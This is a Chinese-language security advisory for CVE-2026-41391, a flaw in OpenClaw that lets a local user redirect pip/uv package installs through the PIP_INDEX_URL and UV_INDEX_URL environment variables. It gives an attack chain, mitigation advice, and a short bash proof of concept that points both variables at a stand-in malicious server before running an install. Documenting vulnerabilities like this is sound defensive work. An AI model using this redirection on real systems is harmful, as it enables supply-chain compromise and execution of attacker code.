CVE-2026-41391 CVSS 5.3 中危

CVE-2026-41391 OpenClaw环境变量污染漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41391

漏洞类型

环境变量注入

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.31之前的版本中存在安全漏洞，未能正确清理主机执行上下文中的PIP_INDEX_URL和UV_INDEX_URL环境变量。这一问题允许攻击者重定向Python包索引流量，通过注入恶意索引URL来拦截或操纵包管理操作。

技术细节

该漏洞源于OpenClaw在处理Python包管理工具（pip/uv）相关操作时，缺乏对环境变量的严格校验。在主机执行上下文中，OpenClaw直接信任并使用了PIP_INDEX_URL和UV_INDEX_URL环境变量。攻击者若具备本地低权限，即可将这些变量设置为指向恶意控制的服务器地址。当系统或用户触发依赖安装或更新流程时，OpenClaw会从攻击者指定的源下载包。这可能导致恶意代码被执行，从而引发供应链攻击，破坏系统机密性与完整性。

攻击链分析

STEP 1

1. 获取本地访问权限

攻击者获得目标系统的本地低权限访问能力（PR:L）。

STEP 2

2. 注入恶意环境变量

攻击者设置PIP_INDEX_URL或UV_INDEX_URL环境变量，将其指向恶意控制的Python包索引服务器。

STEP 3

3. 触发包管理操作

受害者或自动化任务触发OpenClaw进行包安装或更新操作。

STEP 4

4. 流量重定向与劫持

OpenClaw读取被污染的环境变量，连接至攻击者控制的服务器请求包。

STEP 5

5. 执行恶意代码

恶意包被下载并安装，导致后门植入或代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-41391: OpenClaw Environment Variable Pollution
# Setting malicious index URLs to redirect package traffic

export PIP_INDEX_URL="http://malicious-server.com/simple"
export UV_INDEX_URL="http://malicious-server.com/simple"

# Execute OpenClaw operation (simulated)
# OpenClaw will now fetch packages from the malicious URL
openclaw install --package example-package

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

在升级修复前，严格检查并清空PIP_INDEX_URL和UV_INDEX_URL环境变量，确保包安装来源可信，避免在不可信环境中运行OpenClaw。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表